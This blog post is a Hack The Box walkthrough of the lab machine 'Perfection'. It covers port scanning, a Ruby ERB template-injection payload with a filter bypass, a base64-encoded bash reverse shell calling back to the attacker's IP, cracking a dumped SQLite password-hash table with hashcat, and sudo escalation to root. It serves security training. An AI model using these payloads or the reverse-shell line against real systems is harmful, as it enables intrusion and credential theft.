<!DOCTYPE html><html lang="en" data-mode="dark" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7"><meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black-translucent"><meta name="viewport" content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover" ><meta name="generator" content="Jekyll v4.3.3" /><meta property="og:title" content="Hack the box - Perfection pwned!" /><meta property="og:locale" content="en" /><meta name="description" content="Perfection info" /><meta property="og:description" content="Perfection info" /><link rel="canonical" href="https://rubenhortas.github.io/posts/htb-perfection/" /><meta property="og:url" content="https://rubenhortas.github.io/posts/htb-perfection/" /><meta property="og:site_name" content="rubenhortas@blog" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2024-03-17T01:00:01+01:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="Hack the box - Perfection pwned!" /><meta name="twitter:site" content="@rubenhortas" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2025-09-06T23:36:19+02:00","datePublished":"2024-03-17T01:00:01+01:00","description":"Perfection info","headline":"Hack the box - Perfection pwned!","mainEntityOfPage":{"@type":"WebPage","@id":"https://rubenhortas.github.io/posts/htb-perfection/"},"url":"https://rubenhortas.github.io/posts/htb-perfection/"}</script><title>Hack the box - Perfection pwned! | rubenhortas@blog</title><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="rubenhortas@blog"><meta name="application-name" content="rubenhortas@blog"><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link rel="dns-prefetch" href="https://fonts.gstatic.com" crossorigin><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://cdn.jsdelivr.net" ><link rel="dns-prefetch" href="https://cdn.jsdelivr.net" ><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato&family=Source+Sans+Pro:wght@400;600;700;900&display=swap"><link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials"><link rel="dns-prefetch" href="https://www.google-analytics.com"><link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"><link rel="stylesheet" href="/assets/css/style.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tocbot@4.20.1/dist/tocbot.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1/dist/magnific-popup.min.css"> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script><body data-topbar-visible="true"><div id="sidebar" class="d-flex flex-column align-items-end"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" class="mx-auto"> <img src="/assets/img/avatar.jpg" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title"> <a href="/">rubenhortas@blog</a></div><div class="site-subtitle font-italic">Learning everyday</div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item"> <a href="/tags/" class="nav-link"> <i class="fa-fw fas fa-tag ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item"> <a href="/about/" class="nav-link"> <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center"> <a href="javascript:location.href = 'mailto:' + ['rubenhortas','gmail.com'].join('@')" aria-label="email" > <i class="fas fa-envelope"></i> </a> <a href="https://www.linkedin.com/in/rubenhortas" aria-label="linkedin" target="_blank" rel="noopener noreferrer"> <i class="fab fa-linkedin"></i> </a> <a href="https://github.com/rubenhortas" aria-label="github" target="_blank" rel="noopener noreferrer"> <i class="fab fa-github"></i> </a> <a href="https://twitter.com/rubenhortas" aria-label="twitter" target="_blank" rel="noopener noreferrer"> <i class="fab fa-twitter"></i> </a> <a href="/feed.xml" aria-label="rss" > <i class="fas fa-rss"></i> </a></div></div><div id="topbar-wrapper"><div id="topbar" class="container d-flex align-items-center justify-content-between h-100 pl-3 pr-3 pl-md-4 pr-md-4"> <span id="breadcrumb"> <span> <a href="/"> Home </a> </span> <span>Hack the box - Perfection pwned!</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Search..."> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper" class="d-flex justify-content-center"><div id="main" class="container pl-xl-4 pr-xl-4"><div class="row"><div id="core-wrapper" class="col-12 col-lg-11 col-xl-9 pr-xl-4"><div class="post pl-1 pr-1 pl-md-2 pr-md-2"><h1 data-toc-skip>Hack the box - Perfection pwned!</h1><div class="post-meta text-muted"> <span> Posted <em class="" data-ts="1710633601" data-df="ll" data-toggle="tooltip" data-placement="bottom"> Mar 17, 2024 </em> </span> <span> Updated <em class="" data-ts="1757194579" data-df="ll" data-toggle="tooltip" data-placement="bottom"> Sep 6, 2025 </em> </span><div class="d-flex justify-content-between"> <span> By <em> <a href="https://github.com/rubenhortas">Rubén Hortas</a> </em> </span><div> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="945 words"> <em>5 min</em> read</span></div></div></div><div class="post-content"><p><a href="/assets/img/posts/htb-perfection-info.png" class="popup img-link "><img data-src="/assets/img/posts/htb-perfection-info.png" alt="Perfection info" class="lazyload" data-proofer-ignore></a> <em>Perfection info</em></p><h2 id="annotations"><span class="mr-2">Annotations</span><a href="#annotations" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><blockquote class="prompt-info"><p>In this article we are going to assume the following ip addresses:</p><p>Local machine (attacker, local host): 10.10.16.108</p><p>Target machine (victim, Perfection): 10.10.11.253</p></blockquote><h2 id="enumeration"><span class="mr-2">Enumeration</span><a href="#enumeration" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>Let’s go look for the open ports in the machine using <code class="language-plaintext highlighter-rouge">nmap</code>:</p><p><code class="language-plaintext highlighter-rouge">nmap -Pn -n -sS -p- --open -T5 --min-rate 5000 -oN nmap_initial.txt 10.10.11.253</code></p><div class="language-shell highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre>PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
</pre></table></code></div></div><h2 id="footprinting"><span class="mr-2">Footprinting</span><a href="#footprinting" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>We fine tune the scan to see if we can get more information about the running services:</p><div class="language-shell highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre><td class="rouge-code"><pre>PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
| ssh-hostkey:
|   256 80e479e85928df952dad574a4604ea70 <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 e9ea0c1d8613ed95a9d00bc822e4cfe9 <span class="o">(</span>ED25519<span class="o">)</span>
80/tcp open  http    nginx
|_http-title: Weighted Grade Calculator
Service Info: OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel
</pre></table></code></div></div><p>We can see that there is a web service running on port 80, so we browse to <code class="language-plaintext highlighter-rouge">http://10.10.11.253</code> and we take a look at the web:</p><p><a href="/assets/img/posts/htb-perfection-weighted-grade-calculation-home.png" class="popup img-link "><img data-src="/assets/img/posts/htb-perfection-weighted-grade-calculation-home.png" alt="Home" class="lazyload" data-proofer-ignore></a> <em>Home</em></p><p><a href="/assets/img/posts/htb-perfection-weighted-grade-calculation-about-us.png" class="popup img-link "><img data-src="/assets/img/posts/htb-perfection-weighted-grade-calculation-about-us.png" alt="About us" class="lazyload" data-proofer-ignore></a> <em>About us</em></p><p><a href="/assets/img/posts/htb-perfection-weighted-grade-calculation-calculate.png" class="popup img-link "><img data-src="/assets/img/posts/htb-perfection-weighted-grade-calculation-calculate.png" alt="Weighted Grade Calculator" class="lazyload" data-proofer-ignore></a> <em>Weighted Grade Calculator</em></p><p>The web contains a too to calculating student grades based on weighting. If we look at the bottom, we can see that is powered by <a href="https://en.wikipedia.org/wiki/WEBrick">WEBrick</a>.</p><p><a href="/assets/img/posts/htb-perfection-webrick.png" class="popup img-link "><img data-src="/assets/img/posts/htb-perfection-webrick.png" alt="Powered by WEBrick" class="lazyload" data-proofer-ignore></a> <em>Powered by WEBrick</em></p><p><a href="https://en.wikipedia.org/wiki/WEBrick">WEBrick</a> is a ruby library provinding HTTP web servers. If we look at more information on the web with wappalizer, we can see that is using Ruby 3.0.2.</p><p><a href="/assets/img/posts/htb-perfection-wappalizer.png" class="popup img-link "><img data-src="/assets/img/posts/htb-perfection-wappalizer.png" alt="Wappalizer" class="lazyload" data-proofer-ignore></a> <em>Wappalizer info</em></p><p>This versions does not seems vulnerable, so we have to try another approach.</p><h2 id="foothold"><span class="mr-2">Foothold</span><a href="#foothold" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><h3 id="ssti-sever-side-template-injection"><span class="mr-2">SSTI (Sever Side Template Injection)</span><a href="#ssti-sever-side-template-injection" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3><p>As the only place from which we can enter data is the weighted grade calculator, we can try there some <a href="https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#erb-ruby">Ruby SSTIs</a>. The most convenient way is intercepting the request using burp, send it to the burp repeater and modifying it there. There’s a “bad characters” protection, but we can bypass it using url encoding. Now that we know that there is a SSTI, we can try to inject a reverse shell. The first thing is start a listener on our machine:</p><p><code class="language-plaintext highlighter-rouge">nc -lvnp 12345</code></p><p>Now, we need a reverse shell capable to avoid the “bad characters” protection, so we encoded it on base64:</p><div class="language-shell highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre><span class="nb">echo</span> <span class="s2">"bash  -i &gt;&amp; /dev/tcp/10.10.16.108/12345  0&gt;&amp;1"</span> | <span class="nb">base64
</span><span class="nv">YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTYuMTA4LzEyMzQ1ICAwPiYxCg</span><span class="o">==</span>
</pre></table></code></div></div><p>Now, we wrap it so that the reverse shell will be executed on the server:</p><p><code class="language-plaintext highlighter-rouge">echo YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTYuMTA4LzEyMzQ1ICAwPiYxCg== | base64 -d | bash</code></p><p>We wrap it so that our payload will be interpreted by ruby taking advantage of the SSTI:</p><p><code class="language-plaintext highlighter-rouge">&lt;%=system("echo YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTYuMTA4LzEyMzQ1ICAwPiYxCg== | base64 -d | bash");%&gt;</code></p><p>And, finally, we urlencode it:</p><p><code class="language-plaintext highlighter-rouge">%0A&lt;%25%3dsystem("echo+YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTYuMTA4LzEyMzQ1ICAwPiYxCg==+|+base64+-d+|+bash");%25&gt;</code></p><p>Now that we have our payload ready, we will inject it on the request using burp:</p><p><a href="/assets/img/posts/htb-perfection-wgc-request.png" class="popup img-link "><img data-src="/assets/img/posts/htb-perfection-wgc-request.png" alt="Original request" class="lazyload" data-proofer-ignore></a> <em>Original request</em></p><p><a href="/assets/img/posts/htb-perfection-wgc-request-payload.png" class="popup img-link "><img data-src="/assets/img/posts/htb-perfection-wgc-request-payload.png" alt="Request payload" class="lazyload" data-proofer-ignore></a> <em>Request payload</em></p><blockquote class="prompt-warning"><p>Note the “1” before the payload</p></blockquote><p>We send the request and we got shell!</p><h3 id="susan"><span class="mr-2">susan</span><a href="#susan" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3><p>First thing is upgrading the tty to be able to work comfortably:</p><div class="language-shell highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre>script /dev/null <span class="nt">-c</span> bash
ctrl+z
<span class="nb">stty </span>raw <span class="nt">-echo</span><span class="p">;</span> <span class="nb">fg
</span>reset xterm
<span class="nb">export </span><span class="nv">TERM</span><span class="o">=</span>xterm-256color
<span class="nb">stty </span>rows 56 columns 209
</pre></table></code></div></div><p>Now, we can start collecting information about our new user:</p><div class="language-shell highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre>susan@perfection:~/ruby_app<span class="nv">$ </span><span class="nb">whoami
</span>susan
susan@perfection:~/ruby_app<span class="nv">$ </span><span class="nb">id
</span><span class="nv">uid</span><span class="o">=</span>1001<span class="o">(</span>susan<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1001<span class="o">(</span>susan<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>1001<span class="o">(</span>susan<span class="o">)</span>,27<span class="o">(</span><span class="nb">sudo</span><span class="o">)</span>
</pre></table></code></div></div><div class="language-shell highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre>susan@perfection:~<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-lA</span>
drwxr-xr-x 2 root  root    4096 Oct 27 10:36 Migration
drwxr-xr-x 4 root  susan   4096 Oct 27 10:36 ruby_app
<span class="nt">-rw-r-----</span> 1 root  susan     33 Mar 16 19:10 user.txt
</pre></table></code></div></div><p>We got our user flag:</p><p><code class="language-plaintext highlighter-rouge">cat user.txt</code></p><p>We still need to escalate privileges, so we keep looking.</p><div class="language-shell highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
</pre><td class="rouge-code"><pre>susan@perfection:~<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-R</span> Migration/
Migration/:
pupilpath_credentials.db
susan@perfection:~<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-R</span> ruby_app/
ruby_app/:
main.rb  public  views

ruby_app/public:
css  fonts  images

ruby_app/public/css:
font-awesome.min.css  lato.css  montserrat.css  w3.css

ruby_app/public/fonts:
JTUHjIg1_i6t8kCHKm4532VJOt5-QNFgpCtr6Hw5aX8.ttf  S6uyw4BMUTPHjx4wWw.ttf

ruby_app/public/images:
checklist.jpg  lightning.png  susan.jpg  tina.jpg

ruby_app/views:
about.erb  index.erb  weighted_grade.erb  weighted_grade_results.erb
</pre></table></code></div></div><p>We see an interesting file: <code class="language-plaintext highlighter-rouge">pupilpath_credentials.db</code>, so we are going to continue investigating there:</p><div class="language-shell highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>susan@perfection:~<span class="nv">$ </span>file Migration/pupilpath_credentials.db
Migration/pupilpath_credentials.db: SQLite 3.x database, last written using SQLite version 3037002, file counter 6, database pages 2, cookie 0x1, schema 4, UTF-8, version-valid-for 6
</pre></table></code></div></div><p>A sqlite database called credentials… Let’s see what contains!</p><div class="language-shell highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre><td class="rouge-code"><pre><span class="nv">$ </span>sqlite3 pupilpath_credentials.database

sqlite&gt; .tables
<span class="nb">users

</span>sqlite&gt; <span class="k">select</span> <span class="k">*</span> from <span class="nb">users</span><span class="p">;</span>
1|Susan Miller|abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f
2|Tina Smith|dd560928c97354e3c22972554c81901b74ad1b35f726a11654b78cd6fd8cec57
3|Harry Tyler|d33a689526d49d32a01986ef5a1a3d2afc0aaee48978f06139779904af7a6393
4|David Lawrence|ff7aedd2f4512ee1848a3e18f86c4450c1c76f5c6e27cd8b0dc05557b344b87a
5|Stephen Locke|154a38b253b4e08cba818ff65eb4413f20518655950b9a39964c18d7737d9bb8
</pre></table></code></div></div><p>We have some users with their passwords hashes.</p><p>If we review Susan’s mails, we will find some useful information:</p><div class="language-shell highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre><td class="rouge-code"><pre><span class="nv">$ </span><span class="nb">cat</span> /var/mail/susan
Due to our transition to Jupiter Grades because of the PupilPath data breach, I thought we should also migrate our credentials <span class="o">(</span><span class="s1">'our'</span> including the other students

<span class="k">in </span>our class<span class="o">)</span> to the new platform. I also suggest a new password specification, to make things easier <span class="k">for </span>everyone. The password format is:

<span class="o">{</span>firstname<span class="o">}</span>_<span class="o">{</span>firstname backwards<span class="o">}</span>_<span class="o">{</span>randomly generated integer between 1 and 1,000,000,000<span class="o">}</span>

Note that all letters of the first name should be convered into lowercase.

Please hit me with updates on the migration when you can. I am currently registering our university with the platform.

- Tina, your delightful students
</pre></table></code></div></div><p>Great! We have the password format and the hash, so we can crack it using hashcat. We will start with <code class="language-plaintext highlighter-rouge">susan</code>, since it’s our current user.</p><p><code class="language-plaintext highlighter-rouge">echo abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f &gt; hash</code> <code class="language-plaintext highlighter-rouge">hashcat -m 1400 hash -a 3 susan_nasus_?d?d?d?d?d?d?d?d?d</code></p><p>After a while we will have Susan’s password, and we will look if she has sudo capabilities.</p><h2 id="privilege-escalation"><span class="mr-2">Privilege escalation</span><a href="#privilege-escalation" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><div class="language-shell highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre><td class="rouge-code"><pre><span class="nv">$ </span><span class="nb">sudo</span> <span class="nt">-l</span>
<span class="o">[</span><span class="nb">sudo</span><span class="o">]</span> password <span class="k">for </span>susan:
Matching Defaults entries <span class="k">for </span>susan on perfection:
    env_reset, mail_badpass, <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin<span class="se">\:</span>/snap/bin, use_pty

User susan may run the following commands on perfection:
    <span class="o">(</span>ALL : ALL<span class="o">)</span> ALL
</pre></table></code></div></div><p>Nice! She can run all commands as root without password, so we elevate our privileges:</p><p><code class="language-plaintext highlighter-rouge">sudo su</code></p><p>And, finally, we get our system flag:</p><p><code class="language-plaintext highlighter-rouge">cat /root/root.txt</code></p><p><a href="/assets/img/posts/htb-perfection-pwned.png" class="popup img-link "><img data-src="/assets/img/posts/htb-perfection-pwned.png" alt="Perfection pwned" class="lazyload" data-proofer-ignore></a> <em>Perfection has been pwned</em></p><p><em>Enjoy! ;)</em></p></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/hack-the-box/'>hack the box</a>, <a href='/categories/machine/'>machine</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/hack-the-box/" class="post-tag no-text-decoration" >hack the box</a> <a href="/tags/perfection/" class="post-tag no-text-decoration" >perfection</a> <a href="/tags/ruby/" class="post-tag no-text-decoration" >ruby</a> <a href="/tags/ssti/" class="post-tag no-text-decoration" >ssti</a> <a href="/tags/password-cracking/" class="post-tag no-text-decoration" >password cracking</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/"> CC BY 4.0 </a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Hack%20the%20box%20-%20Perfection%20pwned!%20-%20rubenhortas@blog&url=https%3A%2F%2Frubenhortas.github.io%2Fposts%2Fhtb-perfection%2F" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Hack%20the%20box%20-%20Perfection%20pwned!%20-%20rubenhortas@blog&u=https%3A%2F%2Frubenhortas.github.io%2Fposts%2Fhtb-perfection%2F" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Frubenhortas.github.io%2Fposts%2Fhtb-perfection%2F" data-toggle="tooltip" data-placement="top" title="Linkedin" target="_blank" rel="noopener" aria-label="Linkedin"> <i class="fa-fw fab fa-linkedin"></i> </a> <i id="copy-link" class="fa-fw fas fa-link small" data-toggle="tooltip" data-placement="top" title="Copy link" data-title-succeed="Link copied successfully!"> </i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted"><div class="access"><div id="access-lastmod" class="post"><div class="panel-heading">Recently Updated</div><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/neovim-python-ide/">Configuring Neovim as Python IDE</a><li><a href="/posts/neovim-rust-ide/">Configuring Neovim as Rust IDE</a><li><a href="/posts/neovim-c-standard-ide/">Configuring Neovim as Standard C IDE</a><li><a href="/posts/pycharm-neovim-ruff-consistency/">Unify Python Linting. Syncing Ruff between PyCharm and Neovim</a><li><a href="/posts/check-ntp-servers-windows/">How to check NTP servers from Windows</a></ul></div><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/hack-the-box/">hack the box</a> <a class="post-tag" href="/tags/challenge/">challenge</a> <a class="post-tag" href="/tags/gnu-linux/">gnu/linux</a> <a class="post-tag" href="/tags/administration/">administration</a> <a class="post-tag" href="/tags/personal/">personal</a> <a class="post-tag" href="/tags/hardening/">hardening</a> <a class="post-tag" href="/tags/htb/">htb</a> <a class="post-tag" href="/tags/programming/">programming</a> <a class="post-tag" href="/tags/python/">python</a> <a class="post-tag" href="/tags/ssh/">ssh</a></div></div></div><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><div class="panel-heading pl-3 pt-2 mb-2">Contents</div><nav id="toc"></nav></div><script src="https://cdn.jsdelivr.net/npm/tocbot@4.20.1/dist/tocbot.min.js"></script></div></div><div class="row"><div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 pl-3 pr-3 pr-xl-4 mt-5"><div id="related-posts" class="mb-2 mb-sm-4"><h3 class="pt-2 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/htb-nibbles/"><div class="card-body"> <em class="small" data-ts="1688342401" data-df="ll" > Jul 3, 2023 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hack the box - Nibbles</h3><div class="text-muted small"><p> Nibbles In this article we are going to assume the following IP addresses: Local machine (attacker, localhost): 10.0.0.1 Target machine (victim, Nibbles box): 10.0.0.2 As this is a ret...</p></div></div></a></div><div class="card"> <a href="/posts/htb-getting-started/"><div class="card-body"> <em class="small" data-ts="1688515201" data-df="ll" > Jul 5, 2023 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hack the box - Getting started</h3><div class="text-muted small"><p> Getting started In this article we are going to assume the folling ip addresses: Local machine (attacker, localhost): 10.0.0.1 Target machine (victim, Getting started box): 10.0.0.2 Th...</p></div></div></a></div><div class="card"> <a href="/posts/htb-twomillion/"><div class="card-body"> <em class="small" data-ts="1706918401" data-df="ll" > Feb 3, 2024 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hack the box - TwoMillion pwned!</h3><div class="text-muted small"><p> TwoMillion has been Pwned Enjoy! ;)</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/posts/htb-bizness/" class="btn btn-outline-primary" prompt="Older"><p>Hack the box - Bizness pwned!</p></a> <a href="/posts/htb-fentastic-moves/" class="btn btn-outline-primary" prompt="Newer"><p>Hack The Box - Fentastic Moves pwned!</p></a></div></div></div></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-sm-11 post-content"><div id="search-hints"><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/hack-the-box/">hack the box</a> <a class="post-tag" href="/tags/challenge/">challenge</a> <a class="post-tag" href="/tags/gnu-linux/">gnu/linux</a> <a class="post-tag" href="/tags/administration/">administration</a> <a class="post-tag" href="/tags/personal/">personal</a> <a class="post-tag" href="/tags/hardening/">hardening</a> <a class="post-tag" href="/tags/htb/">htb</a> <a class="post-tag" href="/tags/programming/">programming</a> <a class="post-tag" href="/tags/python/">python</a> <a class="post-tag" href="/tags/ssh/">ssh</a></div></div></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><footer><div class="container pl-lg-4 pr-lg-4"><div class="d-flex justify-content-between align-items-center text-muted ml-md-3 mr-md-3"><div class="footer-left"><p class="mb-0"> © 2026 <a href="https://github.com/rubenhortas">Rubén Hortas</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0">Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a> theme.</p></div></div></div></footer><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: 